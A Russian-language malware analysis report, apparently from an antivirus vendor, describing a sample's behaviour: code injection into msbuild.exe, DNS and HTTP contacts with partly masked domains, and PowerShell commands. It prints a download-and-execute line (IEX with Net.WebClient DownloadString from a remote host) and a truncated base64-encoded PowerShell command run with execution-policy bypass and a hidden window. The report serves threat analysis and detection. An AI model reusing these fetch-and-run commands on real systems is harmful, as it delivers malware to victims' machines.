Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command IEX (New-Object('Net.WebClient')).'DoWnloadsTrInG'('http://lu##.world/parse.jpg')
Внедряет код в
следующие системные процессы:
- %WINDIR%\microsoft.net\framework\v2.0.50727\msbuild.exe
Сетевая активность
TCP
Запросы HTTP GET
- http://lu##.world/parse.jpg
- http://pa##e.ee/r/C4FP6/0
UDP
- DNS ASK lu##.world
- DNS ASK pa##e.ee
- DNS ASK su#####yat.duckdns.org
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command IEX (New-Object('Net.WebClient')).'DoWnloadsTrInG'('http://lu##.world/parse.jpg')' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ExecutionPolicy bypass -w 1 /e JAB2AGMAbgB5AEQAcgBOAEoAIAA9ACAAKAAnAHsAMgB9AHsAMAB9AHsAMQB9AHsAMwB9ACcALQBmACcAZABTAHQAJwAsACcAcgBpAG4AJwAsABwgYABEAGAAbwBgAHcAbgBgAGwAYABvAGEAHSAsACcAZwAnACkAO...
- '%WINDIR%\microsoft.net\framework\v2.0.50727\msbuild.exe'
